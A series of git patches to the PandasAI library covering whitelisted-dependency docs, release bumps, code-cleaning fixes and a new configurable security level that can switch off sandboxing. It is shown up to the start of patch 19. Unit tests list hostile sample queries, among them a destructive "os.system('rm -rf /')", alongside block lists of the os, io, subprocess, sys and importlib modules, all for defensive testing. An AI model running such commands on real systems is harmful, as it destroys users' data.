Subject: [PATCH 09/58] docs: update docs about custom whitelisted
dependencies
---
docs/custom-whitelisted-dependencies.mdx | 26 ++++++++++++++++++++----
1 file changed, 22 insertions(+), 4 deletions(-)
diff --git a/docs/custom-whitelisted-dependencies.mdx b/docs/custom-whitelisted-dependencies.mdx
index 29d9e9b97..0d3c62721 100644
--- a/docs/custom-whitelisted-dependencies.mdx
+++ b/docs/custom-whitelisted-dependencies.mdx
@@ -2,12 +2,30 @@
title: "Custom whitelisted dependencies"
---
-By default, PandasAI only allows to run code that uses some whitelisted modules. This is to prevent malicious code from being executed on the server or locally. However, it is possible to add custom modules to the whitelist. This can be done by passing a list of modules to the `custom_whitelisted_dependencies` parameter when instantiating the `SmartDataframe` or `SmartDatalake` class.
+By default, PandasAI only allows running code that uses some whitelisted modules. This is to prevent malicious code from being executed on the server or locally.
+
+The whitelisted modules are:
+
+- `pandas`
+- `numpy`
+- `matplotlib`
+- `seaborn`
+- `datetime`
+- `json`
+- `base64`
+
+These libraries are sandboxed for security reasons, so that malicious code cannot be executed on the server or locally.
+
+However, it is possible to add custom modules to the whitelist. This can be done by passing a list of modules to the `custom_whitelisted_dependencies` parameter when instantiating the `Agent` class.
+
+**Note**: PandasAI cannot sandbox arbitrary code execution for custom libraries that are whitelisted. If you add a custom library to the whitelist, arbitrary code execution will be possible for that library. Whitelisting a custom library means that the library is "trusted" and can be used without any limitations. **Only whitelist libraries that are under your control or that you trust**.
+
+For example, to add the `scikit-learn` module to the whitelist:
```python
-from pandasai import SmartDataframe
-df = SmartDataframe("data.csv", config={
- "custom_whitelisted_dependencies": ["seaborn"]
+from pandasai import Agent
+agent = Agent("data.csv", config={
+ "custom_whitelisted_dependencies": ["scikit-learn"]
})
```
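As a hedged usage sketch of the updated example: once a module is whitelisted it is treated as trusted, so generated code can import and call it without restriction (the file name and query below are illustrative):

```python
from pandasai import Agent

# Whitelisting follows the docs example above; only do this for
# libraries you control or trust, since they are not sandboxed.
agent = Agent("data.csv", config={
    "custom_whitelisted_dependencies": ["scikit-learn"]
})

# Generated code importing the whitelisted library now passes the
# import check instead of raising BadImportError.
agent.chat("Fit a linear regression of sales on price and plot it")
```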
From b809841a26d0b71a91d20a65bfcdb0a61e97beea Mon Sep 17 00:00:00 2001
From: Gabriele Venturi
Date: Wed, 20 Nov 2024 20:04:31 +0100
Subject: [PATCH 10/58] Release v2.4.0
---
pyproject.toml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/pyproject.toml b/pyproject.toml
index 2b2a10714..a2697aaa0 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -1,6 +1,6 @@
[tool.poetry]
name = "pandasai"
-version = "2.3.0"
+version = "2.4.0"
description = "Chat with your database (SQL, CSV, pandas, polars, mongodb, noSQL, etc). PandasAI makes data analysis conversational using LLMs (GPT 3.5 / 4, Anthropic, VertexAI) and RAG."
authors = ["Gabriele Venturi"]
license = "MIT"
From 34535a2eee77b07eddf4f77e29528a360f59b52a Mon Sep 17 00:00:00 2001
From: bencekecskes
Date: Wed, 18 Dec 2024 10:09:48 +0100
Subject: [PATCH 11/58] fix: update last_code_generated in smart_dataframe's
__init__.py (#1484)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
In the SmartDataframe class, the last_code_generated property returned _agent.last_code_executed instead of _agent.last_code_generated. In SmartDatalake it is implemented correctly.
Co-authored-by: Bence Kecskés
---
pandasai/smart_dataframe/__init__.py | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/pandasai/smart_dataframe/__init__.py b/pandasai/smart_dataframe/__init__.py
index 574fbe28e..756c3cbb6 100644
--- a/pandasai/smart_dataframe/__init__.py
+++ b/pandasai/smart_dataframe/__init__.py
@@ -171,7 +171,7 @@ def last_prompt_id(self) -> uuid.UUID:
@property
def last_code_generated(self):
- return self._agent.last_code_executed
+ return self._agent.last_code_generated
@property
def last_code_executed(self):
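The fix matters because the two values can diverge: code is generated first and may be cleaned, corrected, or retried before anything is executed. A minimal sketch of the delegation the property should perform (the surrounding class is reduced to the relevant pieces):

```python
class SmartDataframe:
    def __init__(self, agent):
        self._agent = agent

    @property
    def last_code_generated(self):
        # Previously returned self._agent.last_code_executed, so callers
        # inspecting the raw LLM output saw the executed (cleaned) code.
        return self._agent.last_code_generated

    @property
    def last_code_executed(self):
        return self._agent.last_code_executed
```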
From 68b65576f19c73707c20594de4dd89ae5b7e3175 Mon Sep 17 00:00:00 2001
From: Gabriele Venturi
Date: Wed, 18 Dec 2024 10:11:11 +0100
Subject: [PATCH 12/58] Release v2.4.1
---
pyproject.toml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/pyproject.toml b/pyproject.toml
index a2697aaa0..4ef20a0df 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -1,6 +1,6 @@
[tool.poetry]
name = "pandasai"
-version = "2.4.0"
+version = "2.4.1"
description = "Chat with your database (SQL, CSV, pandas, polars, mongodb, noSQL, etc). PandasAI makes data analysis conversational using LLMs (GPT 3.5 / 4, Anthropic, VertexAI) and RAG."
authors = ["Gabriele Venturi"]
license = "MIT"
From daf569677acb77ab4f4af5607685196f27c754f6 Mon Sep 17 00:00:00 2001
From: Charis Nikolaidis
Date: Thu, 19 Dec 2024 10:19:35 +0200
Subject: [PATCH 13/58] fix: docker-compose-npm-error (#1486)
- Simplified the type of children to just React.ReactNode, which is the standard type for React components' children prop.
---
client/components/card/index.tsx | 5 +++--
1 file changed, 3 insertions(+), 2 deletions(-)
diff --git a/client/components/card/index.tsx b/client/components/card/index.tsx
index 028f368e2..1d2f61be8 100644
--- a/client/components/card/index.tsx
+++ b/client/components/card/index.tsx
@@ -1,8 +1,9 @@
import React from "react";
+
function Card(props: {
className?: string;
extra?: string;
- children?: React.ReactNode | Element;
+ children?: React.ReactNode; // Simplified type
default?: boolean;
}) {
const { extra, children, ...rest } = props;
@@ -11,7 +12,7 @@ function Card(props: {
className={`!z-5 relative flex flex-col rounded-[20px] shadow-[rgba(0, 0, 0, 0.2)] shadow-md border border-gray-100 dark:border-none dark:shadow-none bg-clip-border dark:!bg-darkMain dark:text-white ${extra}`}
{...rest}
>
- <>{children}</>
+ {children} {/* Removed unnecessary fragment */}
);
}
From d63f918372930e9d8df21022018c2c5f2f1db169 Mon Sep 17 00:00:00 2001
From: Arslan Saleem
Date: Thu, 2 Jan 2025 17:31:21 +0100
Subject: [PATCH 14/58] fix: remove plt.show if exists in the generated code
(#1501)
---
pandasai/pipelines/chat/code_cleaning.py | 4 ++++
.../smart_datalake/test_code_cleaning.py | 18 ++++++++++++++++++
2 files changed, 22 insertions(+)
diff --git a/pandasai/pipelines/chat/code_cleaning.py b/pandasai/pipelines/chat/code_cleaning.py
index 5e86975df..a185aeec4 100644
--- a/pandasai/pipelines/chat/code_cleaning.py
+++ b/pandasai/pipelines/chat/code_cleaning.py
@@ -145,11 +145,15 @@ def get_code_to_run(self, code: str, context: CodeExecutionContext) -> Any:
save_charts_path_str=f"{find_project_root()}/exports/charts",
)
+ # If plt.show is in the code, remove that line
+ code = re.sub(r"plt.show\(\)", "", code)
+
# Reset used skills
context.skills_manager.used_skills = []
# Get the code to run removing unsafe imports and df overwrites
code_to_run = self._clean_code(code, context)
+
self._logger.log(
f"""
Code running:
diff --git a/tests/unit_tests/pipelines/smart_datalake/test_code_cleaning.py b/tests/unit_tests/pipelines/smart_datalake/test_code_cleaning.py
index 49169f373..d632f6cc3 100644
--- a/tests/unit_tests/pipelines/smart_datalake/test_code_cleaning.py
+++ b/tests/unit_tests/pipelines/smart_datalake/test_code_cleaning.py
@@ -928,3 +928,21 @@ def test_clean_code_raise_import_with_restricted_using_import_statement(
"""
with pytest.raises(MaliciousQueryError):
code_cleaning.execute(malicious_code, context=context, logger=logger)
+
+ def test_clean_code_with_pltshow_in_code(
+ self,
+ code_cleaning: CodeCleaning,
+ context: PipelineContext,
+ logger: Logger,
+ ):
+ malicious_code = """
+import matplotlib.pyplot as plt
+print('test plt.show is removed')
+plt.show()
+"""
+ code = code_cleaning.execute(malicious_code, context=context, logger=logger)
+
+ assert code.output == """print('test plt.show is removed')"""
+ assert isinstance(code, LogicUnitOutput)
+ assert code.success is True
+ assert code.message == "Code Cleaned Successfully"
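A small sketch of the substitution as written. One hedged caveat: the dots in the pattern are unescaped, so it also matches any character in those positions; an escaped `plt\.show\(\)` would be stricter, though the loose form is harmless for typical generated code:

```python
import re

generated = """
import matplotlib.pyplot as plt
print('test plt.show is removed')
plt.show()
"""

# The substitution from the patch: drop any plt.show() call site.
cleaned = re.sub(r"plt.show\(\)", "", generated)

# plt.show() is gone; the full cleaning pipeline additionally strips
# the now-unused matplotlib import, which is why the test expects only
# the print line to survive.
print(cleaned)
```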
From 63df0175c9fb664a7ffc000ea6cd26a51d8c08a8 Mon Sep 17 00:00:00 2001
From: Arslan Saleem
Date: Thu, 2 Jan 2025 17:32:05 +0100
Subject: [PATCH 15/58] fix: make seaborn an optional dependency (#1500)
* fix: make seaborn an optional dependency
* fix: linting errors
---
pandasai/helpers/dataframe_serializer.py | 5 +++--
pandasai/helpers/optional.py | 3 ++-
2 files changed, 5 insertions(+), 3 deletions(-)
diff --git a/pandasai/helpers/dataframe_serializer.py b/pandasai/helpers/dataframe_serializer.py
index cfaffc9b4..e081fa762 100644
--- a/pandasai/helpers/dataframe_serializer.py
+++ b/pandasai/helpers/dataframe_serializer.py
@@ -1,8 +1,6 @@
import json
from enum import Enum
-import yaml
-
import pandasai.pandas as pd
@@ -160,6 +158,9 @@ def convert_df_to_json_str(self, df: pd.DataFrame, extras: dict) -> str:
def convert_df_to_yml(self, df: pd.DataFrame, extras: dict) -> str:
json_df = self.convert_df_to_json(df, extras)
+
+ import yaml
+
yml_str = yaml.dump(json_df, sort_keys=False, allow_unicode=True)
if "is_direct_sql" in extras and extras["is_direct_sql"]:
return f"\n"
diff --git a/pandasai/helpers/optional.py b/pandasai/helpers/optional.py
index f1d7a830a..2bcdcc146 100644
--- a/pandasai/helpers/optional.py
+++ b/pandasai/helpers/optional.py
@@ -19,7 +19,6 @@
from pandasai.safe_libs.restricted_matplotlib import RestrictedMatplotlib
from pandasai.safe_libs.restricted_numpy import RestrictedNumpy
from pandasai.safe_libs.restricted_pandas import RestrictedPandas
-from pandasai.safe_libs.restricted_seaborn import RestrictedSeaborn
if TYPE_CHECKING:
import types
@@ -80,6 +79,8 @@ def get_environment(additional_deps: List[dict]) -> dict:
for lib in additional_deps:
if lib["name"] == "seaborn":
+ from pandasai.safe_libs.restricted_seaborn import RestrictedSeaborn
+
env["sns"] = RestrictedSeaborn()
if lib["name"] == "datetime":
From cfeb071308fc857ea3d54c191e8e73a6f5638b80 Mon Sep 17 00:00:00 2001
From: Arslan Saleem
Date: Thu, 2 Jan 2025 17:32:29 +0100
Subject: [PATCH 16/58] fix: check if whitelisted lib actually exists in the
additional deps (#1499)
---
pandasai/pipelines/chat/code_cleaning.py | 27 +++++++++----------
.../smart_datalake/test_code_cleaning.py | 4 +++
2 files changed, 17 insertions(+), 14 deletions(-)
diff --git a/pandasai/pipelines/chat/code_cleaning.py b/pandasai/pipelines/chat/code_cleaning.py
index a185aeec4..96dbd91f9 100644
--- a/pandasai/pipelines/chat/code_cleaning.py
+++ b/pandasai/pipelines/chat/code_cleaning.py
@@ -627,23 +627,22 @@ def _check_imports(self, node: Union[ast.Import, ast.ImportFrom]):
if library == "pandas":
return
- if (
- library
- in WHITELISTED_LIBRARIES + self._config.custom_whitelisted_dependencies
- ):
- for alias in node.names:
- self._additional_dependencies.append(
- {
- "module": module,
- "name": alias.name,
- "alias": alias.asname or alias.name,
- }
- )
- return
+ whitelisted_libs = (
+ WHITELISTED_LIBRARIES + self._config.custom_whitelisted_dependencies
+ )
- if library not in WHITELISTED_LIBRARIES:
+ if library not in whitelisted_libs:
raise BadImportError(
f"The library '{library}' is not in the list of whitelisted libraries. "
"To learn how to whitelist custom dependencies, visit: "
"https://docs.pandas-ai.com/custom-whitelisted-dependencies#custom-whitelisted-dependencies"
)
+
+ for alias in node.names:
+ self._additional_dependencies.append(
+ {
+ "module": module,
+ "name": alias.name,
+ "alias": alias.asname or alias.name,
+ }
+ )
diff --git a/tests/unit_tests/pipelines/smart_datalake/test_code_cleaning.py b/tests/unit_tests/pipelines/smart_datalake/test_code_cleaning.py
index d632f6cc3..9506a06bb 100644
--- a/tests/unit_tests/pipelines/smart_datalake/test_code_cleaning.py
+++ b/tests/unit_tests/pipelines/smart_datalake/test_code_cleaning.py
@@ -309,7 +309,11 @@ def test_custom_whitelisted_dependencies(
code_cleaning._config.custom_whitelisted_dependencies = ["my_custom_library"]
output = code_cleaning.execute(code, context=context, logger=logger)
+ print(code_cleaning._additional_dependencies)
assert output.output == "my_custom_library.do_something()"
+ assert (
+ code_cleaning._additional_dependencies[0]["module"] == "my_custom_library"
+ )
assert isinstance(output, LogicUnitOutput)
assert output.success
assert output.message == "Code Cleaned Successfully"
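The reordering makes rejection the first and only gate: anything outside the combined whitelist raises immediately, and the dependency-recording loop now runs for every allowed import, including custom whitelisted ones, which the new test pins down. A minimal standalone sketch of the resulting control flow (the real method operates on `ast` import nodes inside `CodeCleaning`):

```python
class BadImportError(Exception):
    """Stand-in for pandasai's exception of the same name."""

WHITELISTED_LIBRARIES = ["numpy", "matplotlib", "seaborn"]

def check_import(library, names, custom_whitelisted, additional_dependencies):
    whitelisted_libs = WHITELISTED_LIBRARIES + custom_whitelisted
    if library not in whitelisted_libs:
        raise BadImportError(f"The library '{library}' is not whitelisted.")
    # Only reached for whitelisted libraries, so everything recorded
    # here is guaranteed to be allowed.
    for name, asname in names:
        additional_dependencies.append(
            {"module": library, "name": name, "alias": asname or name}
        )

deps = []
check_import("my_custom_library", [("do_something", None)],
             ["my_custom_library"], deps)
assert deps[0]["module"] == "my_custom_library"
```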
From 554a638eee356dfe79b7275264b651533020493b Mon Sep 17 00:00:00 2001
From: Arslan Saleem
Date: Thu, 2 Jan 2025 19:02:53 +0100
Subject: [PATCH 17/58] feat(security): add security config to disable it
(#1498)
* feat(security): add security config to disable it
* fix: linting errors
* fix(safety): push exact match for get attributes
* add additional test case
* fix: test case
* fix: linting errors
* fix: linting errors
* docs(config): update config doc to add new config attribute
---
docs/library.mdx | 1 +
pandasai/agent/base.py | 5 +-
pandasai/helpers/optional.py | 47 +++++++++++++------
pandasai/pipelines/chat/code_cleaning.py | 11 ++++-
pandasai/pipelines/chat/code_execution.py | 5 +-
pandasai/safe_libs/base_restricted_module.py | 2 +-
pandasai/schemas/df_config.py | 3 +-
tests/unit_tests/agent/test_agent.py | 34 ++++++++++++++
.../helpers/test_optional_dependency.py | 15 ++++++
.../smart_datalake/test_code_cleaning.py | 30 ++++++++++--
10 files changed, 128 insertions(+), 25 deletions(-)
diff --git a/docs/library.mdx b/docs/library.mdx
index a1e01097d..228c6d95f 100644
--- a/docs/library.mdx
+++ b/docs/library.mdx
@@ -222,6 +222,7 @@ Settings:
- `use_error_correction_framework`: whether to use the error correction framework. Defaults to `True`. If set to `True`, PandasAI will try to correct the errors in the code generated by the LLM with further calls to the LLM. If set to `False`, PandasAI will not try to correct the errors in the code generated by the LLM.
- `max_retries`: the maximum number of retries to use when using the error correction framework. Defaults to `3`. You can use this setting to override the default number of retries.
- `custom_whitelisted_dependencies`: the custom whitelisted dependencies to use. Defaults to `{}`. You can use this setting to override the default custom whitelisted dependencies. You can find more information about custom whitelisted dependencies [here](/custom-whitelisted-dependencies).
+- `security`: the security level to use. It accepts three values depending on the use case: "none", "standard", and "advanced". "standard" and "advanced" are especially useful for detecting malicious intent in user queries and avoiding the execution of potentially harmful code. Defaults to "standard". The security check may introduce stricter rules that flag benign queries as harmful, so you can deactivate it in the configuration by setting `security` to "none".
## Demo in Google Colab
diff --git a/pandasai/agent/base.py b/pandasai/agent/base.py
index c6203111d..0c29ada1c 100644
--- a/pandasai/agent/base.py
+++ b/pandasai/agent/base.py
@@ -259,7 +259,10 @@ def chat(self, query: str, output_type: Optional[str] = None):
self.assign_prompt_id()
- if self.check_malicious_keywords_in_query(query):
+ if self.config.security in [
+ "standard",
+ "advanced",
+ ] and self.check_malicious_keywords_in_query(query):
raise MaliciousQueryError(
"The query contains references to io or os modules or b64decode method which can be used to execute or access system resources in unsafe ways."
)
diff --git a/pandasai/helpers/optional.py b/pandasai/helpers/optional.py
index 2bcdcc146..3b3f23289 100644
--- a/pandasai/helpers/optional.py
+++ b/pandasai/helpers/optional.py
@@ -51,7 +51,7 @@ def get_version(module: types.ModuleType) -> str:
return version
-def get_environment(additional_deps: List[dict]) -> dict:
+def get_environment(additional_deps: List[dict], secure: bool = True) -> dict:
"""
Returns the environment for the code to be executed.
@@ -73,24 +73,43 @@ def get_environment(additional_deps: List[dict]) -> dict:
},
}
- env["pd"] = RestrictedPandas()
- env["plt"] = RestrictedMatplotlib()
- env["np"] = RestrictedNumpy()
+ if secure:
+ env["pd"] = RestrictedPandas()
+ env["plt"] = RestrictedMatplotlib()
+ env["np"] = RestrictedNumpy()
- for lib in additional_deps:
- if lib["name"] == "seaborn":
- from pandasai.safe_libs.restricted_seaborn import RestrictedSeaborn
+ for lib in additional_deps:
+ if lib["name"] == "seaborn":
+ from pandasai.safe_libs.restricted_seaborn import RestrictedSeaborn
- env["sns"] = RestrictedSeaborn()
+ env["sns"] = RestrictedSeaborn()
- if lib["name"] == "datetime":
- env["datetime"] = RestrictedDatetime()
+ if lib["name"] == "datetime":
+ env["datetime"] = RestrictedDatetime()
- if lib["name"] == "json":
- env["json"] = RestrictedJson()
+ if lib["name"] == "json":
+ env["json"] = RestrictedJson()
- if lib["name"] == "base64":
- env["base64"] = RestrictedBase64()
+ if lib["name"] == "base64":
+ env["base64"] = RestrictedBase64()
+
+ else:
+ env["pd"] = import_dependency("pandas")
+ env["plt"] = import_dependency("matplotlib.pyplot")
+ env["np"] = import_dependency("numpy")
+
+ for lib in additional_deps:
+ if lib["name"] == "seaborn":
+ env["sns"] = import_dependency("seaborn")
+
+ if lib["name"] == "datetime":
+ env["datetime"] = import_dependency("datetime")
+
+ if lib["name"] == "json":
+ env["json"] = import_dependency("json")
+
+ if lib["name"] == "base64":
+ env["base64"] = import_dependency("base64")
return env
diff --git a/pandasai/pipelines/chat/code_cleaning.py b/pandasai/pipelines/chat/code_cleaning.py
index 96dbd91f9..398c10cf9 100644
--- a/pandasai/pipelines/chat/code_cleaning.py
+++ b/pandasai/pipelines/chat/code_cleaning.py
@@ -121,10 +121,14 @@ def _replace_plot_png(self, code):
return re.sub(r"""(['"])([^'"]*\.png)\1""", r"\1temp_chart.png\1", code)
def get_code_to_run(self, code: str, context: CodeExecutionContext) -> Any:
- if self._is_malicious_code(code):
+ if self._config.security in [
+ "standard",
+ "advanced",
+ ] and self._is_malicious_code(code):
raise MaliciousQueryError(
"Code shouldn't use 'os', 'io' or 'chr', 'b64decode' functions as this could lead to malicious code execution."
)
+
code = self._replace_plot_png(code)
self._current_code_executed = code
@@ -475,7 +479,10 @@ def _extract_fix_dataframe_redeclarations(
if target_names and self._check_is_df_declaration(node):
# Construct dataframe from node
code = "\n".join(code_lines)
- env = get_environment(self._additional_dependencies)
+ env = get_environment(
+ self._additional_dependencies,
+ secure=self._config.security in ["standard", "advanced"],
+ )
env["dfs"] = copy.deepcopy(self._get_originals(self._dfs))
if context.skills_manager.used_skills:
for skill_func_name in context.skills_manager.used_skills:
diff --git a/pandasai/pipelines/chat/code_execution.py b/pandasai/pipelines/chat/code_execution.py
index 65acf4656..6ee25ce22 100644
--- a/pandasai/pipelines/chat/code_execution.py
+++ b/pandasai/pipelines/chat/code_execution.py
@@ -153,7 +153,10 @@ def execute_code(self, code: str, context: CodeExecutionContext) -> Any:
# List the required dfs, so we can avoid to run the connectors
# if the code does not need them
dfs = self._required_dfs(code)
- environment: dict = get_environment(self._additional_dependencies)
+ environment: dict = get_environment(
+ self._additional_dependencies,
+ secure=self._config.security in ["standard", "advanced"],
+ )
environment["dfs"] = self._get_originals(dfs)
if len(environment["dfs"]) == 1:
environment["df"] = environment["dfs"][0]
diff --git a/pandasai/safe_libs/base_restricted_module.py b/pandasai/safe_libs/base_restricted_module.py
index 3067a3aab..65e1864bd 100644
--- a/pandasai/safe_libs/base_restricted_module.py
+++ b/pandasai/safe_libs/base_restricted_module.py
@@ -4,7 +4,7 @@ def wrapper(*args, **kwargs):
# Check for any suspicious arguments that might be used for importing
for arg in args + tuple(kwargs.values()):
if isinstance(arg, str) and any(
- module in arg.lower()
+ module == arg.lower()
for module in ["io", "os", "subprocess", "sys", "importlib"]
):
raise SecurityError(
diff --git a/pandasai/schemas/df_config.py b/pandasai/schemas/df_config.py
index eec8307c4..398c466d7 100644
--- a/pandasai/schemas/df_config.py
+++ b/pandasai/schemas/df_config.py
@@ -1,4 +1,4 @@
-from typing import Any, List, Optional, TypedDict
+from typing import Any, List, Literal, Optional, TypedDict
from pandasai.constants import DEFAULT_CHART_DIRECTORY
from pandasai.helpers.dataframe_serializer import DataframeSerializerType
@@ -30,6 +30,7 @@ class Config(BaseModel):
log_server: LogServerConfig = None
direct_sql: bool = False
dataframe_serializer: DataframeSerializerType = DataframeSerializerType.CSV
+ security: Literal["standard", "none", "advanced"] = "standard"
class Config:
arbitrary_types_allowed = True
diff --git a/tests/unit_tests/agent/test_agent.py b/tests/unit_tests/agent/test_agent.py
index 59b9e6958..c1e9986fd 100644
--- a/tests/unit_tests/agent/test_agent.py
+++ b/tests/unit_tests/agent/test_agent.py
@@ -710,3 +710,37 @@ def test_query_detection(self, sample_df, config):
for query in safe_queries:
response = agent.chat(query)
assert "Unfortunately, I was not able to get your answers" not in response
+
+ def test_query_detection_disable_security(self, sample_df, config):
+ config["security"] = "none"
+ agent = Agent(sample_df, config, memory_size=10)
+
+ malicious_queries = [
+ "import os",
+ "import io",
+ "chr(97)",
+ "base64.b64decode",
+ "file = open('file.txt', 'os')",
+ "os.system('rm -rf /')",
+ "io.open('file.txt', 'w')",
+ ]
+
+ expected_malicious_response = (
+ """Unfortunately, I was not able to get your answers, because of the following error:\n\n"""
+ """The query contains references to io or os modules or b64decode method which can be used to execute or access system resources in unsafe ways.\n"""
+ )
+
+ for query in malicious_queries:
+ response = agent.chat(query)
+ assert response != expected_malicious_response
+
+ safe_queries = [
+ "print('Hello world')",
+ "through osmosis",
+ "the ionosphere",
+ "the capital of Norway is Oslo",
+ ]
+
+ for query in safe_queries:
+ response = agent.chat(query)
+ assert "Unfortunately, I was not able to get your answers" not in response
diff --git a/tests/unit_tests/helpers/test_optional_dependency.py b/tests/unit_tests/helpers/test_optional_dependency.py
index db7ed2c2f..e06008ed7 100644
--- a/tests/unit_tests/helpers/test_optional_dependency.py
+++ b/tests/unit_tests/helpers/test_optional_dependency.py
@@ -9,6 +9,9 @@
import pytest
from pandasai.helpers.optional import VERSIONS, get_environment, import_dependency
+from pandasai.safe_libs.restricted_matplotlib import RestrictedMatplotlib
+from pandasai.safe_libs.restricted_numpy import RestrictedNumpy
+from pandasai.safe_libs.restricted_pandas import RestrictedPandas
def test_import_optional():
@@ -91,3 +94,15 @@ def test_env_for_necessary_deps():
assert "pd" in env
assert "plt" in env
assert "np" in env
+
+
+def test_env_for_security():
+ env = get_environment([], secure=True)
+ assert "pd" in env and isinstance(env["pd"], RestrictedPandas)
+ assert "plt" in env and isinstance(env["plt"], RestrictedMatplotlib)
+ assert "np" in env and isinstance(env["np"], RestrictedNumpy)
+
+ env = get_environment([], secure=False)
+ assert "pd" in env and not isinstance(env["pd"], RestrictedPandas)
+ assert "plt" in env and not isinstance(env["plt"], RestrictedMatplotlib)
+ assert "np" in env and not isinstance(env["np"], RestrictedNumpy)
diff --git a/tests/unit_tests/pipelines/smart_datalake/test_code_cleaning.py b/tests/unit_tests/pipelines/smart_datalake/test_code_cleaning.py
index 9506a06bb..be3c83963 100644
--- a/tests/unit_tests/pipelines/smart_datalake/test_code_cleaning.py
+++ b/tests/unit_tests/pipelines/smart_datalake/test_code_cleaning.py
@@ -581,13 +581,16 @@ def test_clean_code_using_multi_incorrect_sql_table(
assert str(excinfo.value) == ("Query uses unauthorized table: table1.")
@patch("pandasai.connectors.pandas.PandasConnector.head")
- def test_fix_dataframe_redeclarations(self, mock_head, context: PipelineContext):
+ def test_fix_dataframe_redeclarations(
+ self, mock_head, context: PipelineContext, config: dict
+ ):
df = pd.DataFrame({"A": [1, 2, 3], "B": [4, 5, 6]})
mock_head.return_value = df
pandas_connector = PandasConnector({"original_df": df})
code_cleaning = CodeCleaning()
code_cleaning._dfs = [pandas_connector]
+ code_cleaning._config = Config(**config)
context.dfs = [pandas_connector]
python_code = """
@@ -605,7 +608,7 @@ def test_fix_dataframe_redeclarations(self, mock_head, context: PipelineContext)
@patch("pandasai.connectors.pandas.PandasConnector.head")
def test_fix_dataframe_multiline_redeclarations(
- self, mock_head, context: PipelineContext
+ self, mock_head, context: PipelineContext, config: dict
):
df = pd.DataFrame({"A": [1, 2, 3], "B": [4, 5, 6]})
mock_head.return_value = df
@@ -613,6 +616,7 @@ def test_fix_dataframe_multiline_redeclarations(
code_cleaning = CodeCleaning()
code_cleaning._dfs = [pandas_connector]
+ code_cleaning._config = Config(**config)
context.dfs = [pandas_connector]
python_code = """
@@ -664,7 +668,7 @@ def test_fix_dataframe_no_redeclarations(self, mock_head, context: PipelineConte
@patch("pandasai.connectors.pandas.PandasConnector.head")
def test_fix_dataframe_redeclarations_with_subscript(
- self, mock_head, context: PipelineContext
+ self, mock_head, context: PipelineContext, config: dict
):
df = pd.DataFrame({"A": [1, 2, 3], "B": [4, 5, 6]})
mock_head.return_value = df
@@ -672,6 +676,7 @@ def test_fix_dataframe_redeclarations_with_subscript(
code_cleaning = CodeCleaning()
code_cleaning._dfs = [pandas_connector]
+ code_cleaning._config = Config(**config)
context.dfs = [pandas_connector]
python_code = """
@@ -689,7 +694,7 @@ def test_fix_dataframe_redeclarations_with_subscript(
@patch("pandasai.connectors.pandas.PandasConnector.head")
def test_fix_dataframe_redeclarations_with_subscript_and_data_variable(
- self, mock_head, context: PipelineContext
+ self, mock_head, context: PipelineContext, config: dict
):
data = {
"country": ["China", "United States", "Japan", "Germany", "United Kingdom"],
@@ -701,6 +706,7 @@ def test_fix_dataframe_redeclarations_with_subscript_and_data_variable(
code_cleaning = CodeCleaning()
code_cleaning._dfs = [pandas_connector]
+ code_cleaning._config = Config(**config)
context.dfs = [pandas_connector]
python_code = """
@@ -723,7 +729,7 @@ def test_fix_dataframe_redeclarations_with_subscript_and_data_variable(
@patch("pandasai.connectors.pandas.PandasConnector.head")
def test_fix_dataframe_redeclarations_and_data_variable(
- self, mock_head, context: PipelineContext
+ self, mock_head, context: PipelineContext, config: Config
):
data = {
"country": ["China", "United States", "Japan", "Germany", "United Kingdom"],
@@ -735,6 +741,7 @@ def test_fix_dataframe_redeclarations_and_data_variable(
code_cleaning = CodeCleaning()
code_cleaning._dfs = [pandas_connector]
+ code_cleaning._config = Config(**config)
context.dfs = [pandas_connector]
python_code = """
@@ -933,6 +940,19 @@ def test_clean_code_raise_import_with_restricted_using_import_statement(
with pytest.raises(MaliciousQueryError):
code_cleaning.execute(malicious_code, context=context, logger=logger)
+ def test_clean_code_raise_not_whitelisted_lib_with_none_security(
+ self,
+ code_cleaning: CodeCleaning,
+ context: PipelineContext,
+ logger: Logger,
+ ):
+ builtins_code = """import scipy
+result = {'type': 'number', 'value': set([1, 2, 3])}"""
+
+ context.config.security = "none"
+ with pytest.raises(BadImportError):
+ code_cleaning.execute(builtins_code, context=context, logger=logger)
+
def test_clean_code_with_pltshow_in_code(
self,
code_cleaning: CodeCleaning,
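Across the patch, the new `security` setting collapses to a single boolean at the execution boundary: `secure = config.security in ["standard", "advanced"]`. A minimal sketch of the resulting dispatch in `get_environment` (the Restricted* classes below are stand-ins for the `pandasai.safe_libs` wrappers):

```python
import importlib

class RestrictedPandas: ...      # stand-ins for the safe_libs wrappers,
class RestrictedMatplotlib: ...  # which proxy the real modules and
class RestrictedNumpy: ...       # reject suspicious calls

def get_environment(additional_deps: list, secure: bool = True) -> dict:
    env = {}
    if secure:
        # "standard"/"advanced": expose only the sandboxed wrappers.
        env["pd"] = RestrictedPandas()
        env["plt"] = RestrictedMatplotlib()
        env["np"] = RestrictedNumpy()
    else:
        # "none": hand the generated code the real modules.
        env["pd"] = importlib.import_module("pandas")
        env["plt"] = importlib.import_module("matplotlib.pyplot")
        env["np"] = importlib.import_module("numpy")
    return env

env = get_environment([], secure=True)
assert isinstance(env["pd"], RestrictedPandas)
```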
From cf33faa5de1fd6ae565240b8eb4373f5de7c929f Mon Sep 17 00:00:00 2001
From: Gabriele Venturi
Date: Thu, 2 Jan 2025 19:09:29 +0100
Subject: [PATCH 18/58] Release v2.4.2
---
pyproject.toml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/pyproject.toml b/pyproject.toml
index 4ef20a0df..a5ccdcfff 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -1,6 +1,6 @@
[tool.poetry]
name = "pandasai"
-version = "2.4.1"
+version = "2.4.2"
description = "Chat with your database (SQL, CSV, pandas, polars, mongodb, noSQL, etc). PandasAI makes data analysis conversational using LLMs (GPT 3.5 / 4, Anthropic, VertexAI) and RAG."
authors = ["Gabriele Venturi"]
license = "MIT"
From 52b04aaf94bff935c0bbd3e3b9d6323e68afeacb Mon Sep 17 00:00:00 2001
From: ArslanSaleem
Date: Wed, 8 Jan 2025 11:31:38 +0100
Subject: [PATCH 19/58] fix(test_cases): handle and clean up pandasai test cases
---
.../pandasai_databricks/databricks.py | 194 ----
.../oracle/pandasai_oracle/oracle.py | 62 --
